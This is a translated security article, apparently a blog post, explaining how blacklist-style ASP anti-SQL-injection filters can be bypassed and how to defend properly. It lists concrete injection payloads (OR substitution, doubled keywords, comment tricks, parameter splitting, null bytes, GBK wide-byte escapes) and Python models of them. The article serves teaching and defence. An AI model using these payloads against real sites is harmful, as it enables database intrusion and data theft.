After reading the post below, I wanted to write something. The original post is as follows:
Title: Is anti-injection really useful?
By: 798146410
Time:
Content:
Many anti-injection codes are circulating on the Internet. Are they actually useful? Here is an anti-injection code found online.
For example:
''' -------- Define part ------------------
Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
'' Customize the strings to be filtered; use "|" to separate them
Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|<|>|-|_"
Fy_Inf = Split(Fy_In, "|")
If Request.Form <> "" Then
    For Each Fy_Post In Request.Form
        For Fy_Xh = 0 To UBound(Fy_Inf)
            If Instr(LCase(Request.Form(Fy_Post)), Fy_Inf(Fy_Xh)) <> 0 Then
                Response.Write "<Script Language=JavaScript>alert('  [the post is cut off here]
The website puts the above code in conn.asp to filter every query it can. Look closer: it seems "=" (the equal sign) is not filtered. Try again...
And so on... an equal sign... When we enter and 1=1 and and 1=2, a dialog box pops up and our IP address and submission method are recorded.
Can we convert "and" into a statement that contains none of these characters? The returned string is base64. Let's proceed with the experiment... Successful.
I looked at several other sites and found that some of them can be injected this way and some cannot. You may try it when injecting.
The filter code has the following problems:
1. On inspection, only POST is filtered; the GET and cookie submission methods are not. ASP programmers like to use Request("a") to fetch data, and that form is not tied to one submission method: it returns the value from the query string, a form field or a cookie, whichever is present. If several are submitted at once the value is taken by priority; the default search order is Request.QueryString, then Request.Form, then Request.Cookies, then Request.ClientCertificate, then Request.ServerVariables. So a payload placed in the URL passes this filter untouched and still reaches the query.
2. A Response.Write that is not followed by Response.End is only decorative. The alert and any history.back() run in the browser, so disabling JavaScript, or sending the request with any tool other than a browser, lets the script carry on and execute the query. The principle is simple enough that I will not explain it. Because the code posted was incomplete (when I wrote this the landlord had only pasted a fragment; the full version was added later and is reproduced at the end of this article), it was not possible to tell whether this defect exists in it. This is not the focus anyway; the methods described below are.
3. Look at the character set it filters: the keyword or is missing, which is a serious mistake.
4. ......
A better-written anti-injection filter would not have these flaws, unless its author was really careless.
The following methods can be used in place of "and" when it is blocked:
1. Work around it with or. For example, if or is not filtered: test.asp?id=999 or exists(select * from admin), or test.asp?id=999 or 1>2. Note that 999 must be a non-existent id, so that the expression before or is false and the result of the whole statement is decided by the expression after or.
2. If the filter simply replaces the keyword with nothing, use test.asp?id=1 aandnd 1>2. After one pass of replacement the result is test.asp?id=1 and 1>2. The same works for other keywords; it is simple and easy to understand, and most filtering programs have this defect (only a filter that repeats the replacement until nothing changes is immune).
3. Mixed case also works, because in ASP string functions such as Replace and Instr use a binary (case-sensitive) comparison by default, so sEleCT <> select. This is easily overlooked. (The filter quoted above applies LCase() before comparing, which closes this hole; many filters do not.)
4. Use comments. If spaces are filtered: test.asp?id=1/**/and/**/1=1. If select is filtered and the back end is MySQL: union/**//*!select*/1,2,3,4, or union/**//*!50000select*/1,2,3,4, where the five-digit number after /*! is a MySQL version number and the enclosed text is parsed only by servers at or above that version. The form union/**/s/**/elec/**/t/**/1,2,3,4 only helps when the application itself strips the /**/ sequences before building the query, because MySQL treats a comment as whitespace and does not reassemble the pieces into select.
5. The principle of breaking keywords is very simple. Submit test.asp?id=127/*&id=*/an&id=d/**/1=1. ASP joins repeated parameters with a comma and a space, so Request("id") receives 127/*, */an, d/**/1=1 (note the spaces). The keyword check sees no and, but if the program then filters out commas and spaces the value becomes 127/**/and/**/1=1, and you know the rest... This does not work in PHP, where a repeated parameter simply overwrites the earlier one. The conditions are demanding (commas and spaces must be stripped after the keyword check), but I guess there are still many sites with this problem.
6. If spaces are filtered, the following can stand in for them: /**/, the full-width (Chinese) space, chr(10) and chr(13).
7. ......
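To make the behaviour behind points 1 to 6 concrete, here is an added example (mine, not code from the post or its author) that models the quoted blacklist filter and the classic-ASP Request() semantics the bypasses depend on. The two ASP behaviours it models are documented ones: Request(name) searches QueryString before Form and Cookies, and repeated parameters within one collection are joined with a comma and a space. The function names, the sample payloads, and the "replace once" and "strip commas and spaces" sanitisers are constructed for the demonstration.

```python
"""Added example (not the post's own code): a Python model of the quoted
blacklist filter and of the classic-ASP Request() behaviour that the
bypasses in points 1 to 6 rely on. Names, payloads and the two sanitisers
are constructed for illustration."""

# Keyword list copied from the quoted filter; "|" is the separator it uses.
FY_IN = ("'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|"
         "master|truncate|char|declare|<|>|-|_")
BLACKLIST = FY_IN.split("|")


def asp_request(querystring, form, cookies, name):
    """Model of Request(name) in classic ASP.

    Each collection maps a parameter name to the list of values submitted
    under that name. The first collection holding the name wins, and
    repeated values are joined with ", " (the behaviour point 5 relies on).
    ClientCertificate and ServerVariables are omitted from the model."""
    for collection in (querystring, form, cookies):
        if name in collection:
            return ", ".join(collection[name])
    return ""


def blacklist_hits(value, keywords=BLACKLIST):
    """Instr(LCase(value), keyword) <> 0, as in the quoted filter."""
    lowered = value.lower()
    return [k for k in keywords if k in lowered]


def form_only_filter_allows(querystring, form, cookies):
    """The quoted filter walks Request.Form only (problem 1 above)."""
    for values in form.values():
        if any(blacklist_hits(v) for v in values):
            return False
    return True


def replace_keywords_once(value, keywords=("and", "or", "select")):
    """A 'replace' style filter: one pass per keyword, so a keyword that is
    re-formed by the removal survives (point 2)."""
    for k in keywords:
        value = value.replace(k, "")
    return value


def strip_commas_and_spaces(value):
    """Sanitiser that removes commas and spaces after the keyword check,
    the precondition for the keyword-breaking trick in point 5."""
    return value.replace(",", "").replace(" ", "")


def case_sensitive_instr(haystack, needle):
    """Instr() with its default binary comparison (point 3)."""
    return needle in haystack


def demo():
    """Run each bypass against the modelled filter and return the results."""
    results = {}

    # Problem 3 / point 1: "or" is absent from the list and "=" is not
    # filtered, so a boolean test built on "or" passes untouched.
    results["and_blocked"] = blacklist_hits("1 and 1=1")        # ['and']
    results["or_passes"] = blacklist_hits("999 or 1=1")         # []

    # Problem 1: the same payload sent in the query string is never
    # inspected, yet Request("id") still returns it.
    qs = {"id": ["1 and 1=1"]}
    results["get_allowed"] = form_only_filter_allows(qs, {}, {})
    results["get_value"] = asp_request(qs, {}, {}, "id")        # '1 and 1=1'

    # Point 2: a single-pass replace re-forms the keyword.
    results["aandnd"] = replace_keywords_once("1 aandnd 1>2")   # '1 and 1>2'

    # Point 3: binary-compare Instr misses a case-mixed keyword.
    results["mixed_case_missed"] = not case_sensitive_instr("1 sEleCT 2", "select")

    # Point 5: repeated parameters are joined with ", "; the keyword check
    # sees no "and", but stripping commas and spaces afterwards rebuilds it.
    qs = {"id": ["127/*", "*/an", "d/**/1=1"]}
    merged = asp_request(qs, {}, {}, "id")
    results["merged"] = merged                                   # '127/*, */an, d/**/1=1'
    results["merged_hits"] = blacklist_hits(merged, ["and", "or", "select", "union"])
    results["rebuilt"] = strip_commas_and_spaces(merged)         # '127/**/and/**/1=1'
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The model deliberately keeps the filter's own structure (lower-case the value, substring-match each keyword) so that each bypass can be traced to one line of the original code; running it prints which payloads the filter would stop and what the query would actually receive.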
Regarding comment characters in SQL statements, add the following:
Access has no comment syntax, so /**/, -- and # cannot be used, but a null byte (%00) can take their place because the rest of the statement is discarded at the null. Example: ' Union SELECT Count(*) FROM admin %00
For the specifics of breaking keywords in ASP, see: http://www.bkjia.com/Article/201104/87001.html
In addition, if the database is MySQL there are further problems such as wide-byte injection, which I will not go through one by one. For wide-byte injection, see:
PHP double-byte and wide-byte encoding vulnerability
Use GBK Double Byte encoding to break through the limit of single quotes escape in PHP for SQL Injection
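As an added illustration of the wide-byte problem (mine, not code from this article or the linked posts): a Python model of PHP's addslashes() applied to a request on a GBK connection, showing why the inserted backslash is swallowed. The addslashes() model, the payload bytes and the helper names are constructed for this example.

```python
"""Added example (not the article's own code): why addslashes()-style
escaping can be defeated on a GBK connection. The byte-level model of
addslashes() and the sample payloads are constructed for illustration."""


def addslashes(raw: bytes) -> bytes:
    """Model of PHP addslashes(): put a backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)          # the escaping backslash, 0x5C
        out.append(b)
    return bytes(out)


def bare_quotes(text: str) -> int:
    """Count single quotes that are not preceded by a backslash, i.e. the
    quotes the SQL parser will still see as string delimiters."""
    return sum(1 for i, c in enumerate(text)
               if c == "'" and (i == 0 or text[i - 1] != "\\"))


def escape_then_decode(raw: bytes, charset: str = "gbk") -> tuple[str, int]:
    """Escape the raw request bytes, then decode them the way a server
    using `charset` will when it builds the query, and report how many
    quotes survive unescaped."""
    text = addslashes(raw).decode(charset)
    return text, bare_quotes(text)


def demo() -> dict:
    # Plain ASCII payload: the backslash lands in front of the quote.
    ascii_text, ascii_quotes = escape_then_decode(b"' or 1=1 -- ")
    # 0xBF followed by the quote: addslashes inserts 0x5C between them,
    # and 0xBF 0x5C is a valid two-byte GBK character, so the backslash
    # becomes the trailing byte of that character and the quote stands free.
    wide_text, wide_quotes = escape_then_decode(b"\xbf' or 1=1 -- ")
    return {
        "ascii_text": ascii_text,
        "ascii_bare_quotes": ascii_quotes,          # 0
        "wide_text": wide_text,
        "wide_bare_quotes": wide_quotes,            # 1
        "wide_backslash_left": "\\" in wide_text,   # False
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The same mechanism applies to any multi-byte charset whose trailing-byte range includes 0x5C; the defence is to escape with the connection's charset in view (mysql_real_escape_string after a proper SET NAMES, or, better, prepared statements), not to add another replacement.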
Breaking through anti-injection filters and carrying on with SQL injection is an area with many skills and much experience; I have only touched on it here. In fact one could write a book about it. There are many divergent ideas and methods; please add your own.
Methods that block injection completely in ASP:
1. Number type (reject anything that is not a plain integer; note that VBScript has no IsNumber(), the function is IsNumeric(), and that IsNumeric() alone also accepts forms such as "1e3" and "&H1F", which the extra checks below do not catch either, so a digits-only test is stricter):
Dim Tmp
Tmp = Request("test")
If Len(Tmp) > 9 Then
    Response.Write "fuck you!"
    Response.End
ElseIf IsNumeric(Tmp) = False Then
    Response.Write "fuck you!"
    Response.End
ElseIf Instr(Tmp, "+") > 0 Then
    Response.Write "fuck you!"
    Response.End
ElseIf Instr(Tmp, "-") > 0 Then
    Response.Write "fuck you!"
    Response.End
ElseIf Instr(Tmp, ".") > 0 Then
    Response.Write "fuck you!"
    Response.End
Else
    Response.Write "OK!"
End If
2. Balanced type (escape the quotes instead of rejecting the input):
Dim Tmp, I
Tmp = Request("test")
Tmp = Replace(Tmp, "'", "\'")
Tmp = Replace(Tmp, """", "\""")
Tmp = Replace(Tmp, Chr(10), "")
Tmp = Replace(Tmp, Chr(13), "")
Response.Write "OK!"
In this way we can block it completely, with no need to filter keywords and carry around a pile of character sets. That approach is unpleasant and very inefficient. One caveat on the balanced type: escaping a quote with a backslash is a MySQL convention. Access and SQL Server do not treat the backslash as an escape character and expect a quote inside a string to be doubled (''), and on a MySQL connection using GBK the wide-byte problem above applies to this replacement too. Parameterised queries (an ADODB.Command with parameters) avoid the question entirely. The cause of SQL injection vulnerabilities is that programmers are careless and lack security awareness. If programmers paid attention to these details when writing code in the first place, why would we need a third-party anti-injection program as a so-called fix?
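The two "complete blocking" methods, re-checked against a real SQL engine as an added example (mine, not the article's code). Python's built-in sqlite3 stands in for the Access or SQL Server back end an ASP site would use; like them, SQLite treats a backslash inside a string literal as an ordinary character and escapes a quote by doubling it. The table, its rows, the payloads and the function names are constructed for the demonstration, and a parameterised query is shown alongside as the form that makes escaping unnecessary.

```python
"""Added example (not the article's code): the 'number type' and 'balanced
type' methods checked against SQLite as a stand-in for Access / SQL Server.
Table, rows, payloads and function names are constructed for illustration."""
import re
import sqlite3

# Strict numeric check, the intent of the "number type" method: only ASCII
# digits, at most nine of them, so "&H1F", "1e3", "+1" and " 1 " are rejected.
NUMERIC = re.compile(r"[0-9]{1,9}")


def is_strict_number(value: str) -> bool:
    return NUMERIC.fullmatch(value) is not None


def escape_backslash(value: str) -> str:
    """The 'balanced type' replacement from the article: ' -> \\' and " -> \\"."""
    return value.replace("'", "\\'").replace('"', '\\"')


def escape_doubling(value: str) -> str:
    """Quote escaping as Access, SQL Server and SQLite expect it: ' -> ''."""
    return value.replace("'", "''")


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO admin VALUES (?, ?)",
                   [(1, "root"), (2, "operator")])   # constructed rows
    return db


def count_by_name_concat(db, name, escaper) -> int:
    """String-built query, as the ASP code would issue it after escaping."""
    sql = "SELECT COUNT(*) FROM admin WHERE name='%s'" % escaper(name)
    return db.execute(sql).fetchone()[0]


def count_by_name_param(db, name) -> int:
    """Parameterised form: the value never becomes part of the SQL text."""
    return db.execute("SELECT COUNT(*) FROM admin WHERE name=?",
                      (name,)).fetchone()[0]


def demo() -> dict:
    db = make_db()
    # A leading backslash neutralises backslash "escaping": after the
    # replacement the query reads  name='\\' OR 1=1 --'  and the engine sees
    # a two-character literal, an OR, and a comment swallowing the last quote.
    payload = "\\' OR 1=1 --"
    candidates = ("127", "1 or 1=1", "&H1F", "1e3", "+1")
    return {
        "strict_accepts": [v for v in candidates if is_strict_number(v)],  # ['127']
        "backslash_rows": count_by_name_concat(db, payload, escape_backslash),  # 2
        "doubling_rows": count_by_name_concat(db, payload, escape_doubling),    # 0
        "param_rows": count_by_name_param(db, payload),                         # 0
        "legit_rows": count_by_name_param(db, "root"),                          # 1
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The backslash variant returns every row because the attacker supplied the backslash themselves; doubling the quote keeps the whole payload inside the literal, and the parameterised query needs no escaping at all.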
After a few years of development, anti-injection programs have become quite good and are not easy to break through. But with a little care, some of them can still be bypassed.
References:
Some SQL injection techniques (technical article)
SQL bypass injection of the latest code
New Idea of ASP bypassing anti-injection: Breaking keywords
PHP double-byte and wide-byte encoding vulnerability
Use GBK Double Byte encoding to break through the limit of single quotes escape in PHP for SQL Injection
The complete code added by the landlord later (note that even this version's keyword list contains neither and, nor or, nor the single quote, so the boolean tests above still pass it; it does, however, inspect QueryString and Cookies as well as Form and calls Response.End, which closes problems 1 and 2). The variables stopwords and checksqlin are not defined here and are presumably set in the site's configuration:
<%
Dim SQL_injdata, SQL_inj, SQL_Get, SQL_Post, SQL_Cookies, SQL_Data
SQL_injdata = "<%|script|insert|select|delete|exec|cast|update|chr|master|truncate|declare|eval"
If stopwords <> "" And Instr(LCase(Request.ServerVariables("PATH_INFO")), "siteconfig.asp") = 0 Then
    SQL_injdata = SQL_injdata & "|" & stopwords
End If
SQL_inj = Split(SQL_injdata, "|")
If checksqlin = "Yes" Then
    If Request.Form <> "" Then StopInjection(Request.Form)
    If Request.QueryString <> "" Then StopInjection(Request.QueryString)
    If Request.Cookies <> "" Then StopInjection(Request.Cookies)
End If

Function StopInjection(values)
    For Each SQL_Get In values
        For SQL_Data = 0 To UBound(SQL_inj)
            'If Instr(LCase(Request(SQL_Get)), SQL_inj(SQL_Data)) > 0 Then
            ' A double quote cannot be written directly into SQL_injdata, so Chr(34) is replaced by ' before the check
            If Instr(LCase(Replace(Request(SQL_Get), Chr(34), "'")), SQL_inj(SQL_Data)) > 0 Then
                Response.Write "<script>alert('Illegal information detected. This submission is forbidden!');history.back()</script>"
                Response.End
            End If
        Next
    Next
End Function
%>